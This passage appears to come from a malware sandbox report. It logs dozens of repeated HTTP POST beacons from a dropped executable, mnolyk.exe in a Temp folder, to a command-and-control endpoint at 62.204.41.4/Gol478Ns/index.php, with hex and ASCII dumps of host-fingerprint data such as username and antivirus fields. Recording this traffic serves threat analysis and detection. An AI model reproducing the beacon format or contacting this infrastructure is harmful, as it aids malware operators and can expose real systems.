                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:36.806961060 CET379INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:36 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        178192.168.2.54986862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:36.986361980 CET379OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:37.051250935 CET380INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:37 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        179192.168.2.54986962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:37.244652033 CET380OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:37.309365988 CET381INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:37 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        18192.168.2.54970862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:16:33.047919035 CET218OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:16:33.112329960 CET219INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:16:33 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        180192.168.2.54987062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:37.486432076 CET381OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:37.549299002 CET382INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:37 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        181192.168.2.54987162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:37.725069046 CET382OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:37.788887978 CET383INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:37 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        182192.168.2.54987262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:37.956882954 CET383OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:38.021882057 CET384INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:37 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        183192.168.2.54987362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:38.196580887 CET384OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:38.263432980 CET384INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:38 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        184192.168.2.54987462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:38.440488100 CET385OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:38.503765106 CET385INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:38 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        185192.168.2.54987562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:38.674669981 CET386OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:38.739365101 CET386INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:38 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        186192.168.2.54987662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:38.908848047 CET387OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:38.973138094 CET387INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:38 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        187192.168.2.54987762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:39.154447079 CET388OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:39.218770981 CET388INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:39 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        188192.168.2.54987862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:39.400319099 CET389OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:39.466084957 CET389INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:39 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        189192.168.2.54987962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:39.657687902 CET390OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:39.721652031 CET390INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:39 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        19192.168.2.54970962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:16:33.287571907 CET219OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:16:33.353867054 CET220INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:16:33 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        190192.168.2.54988062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:39.895059109 CET391OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:39.961123943 CET391INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:39 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        191192.168.2.54988162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:40.148507118 CET392OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:40.217240095 CET392INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:40 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        192192.168.2.54988262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:40.393564939 CET393OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:40.458098888 CET393INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:40 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        193192.168.2.54988362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:40.633558989 CET394OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:40.700082064 CET394INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:40 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        194192.168.2.54988462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:40.878750086 CET395OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:40.944602966 CET395INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:40 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        195192.168.2.54988562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:41.119391918 CET396OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
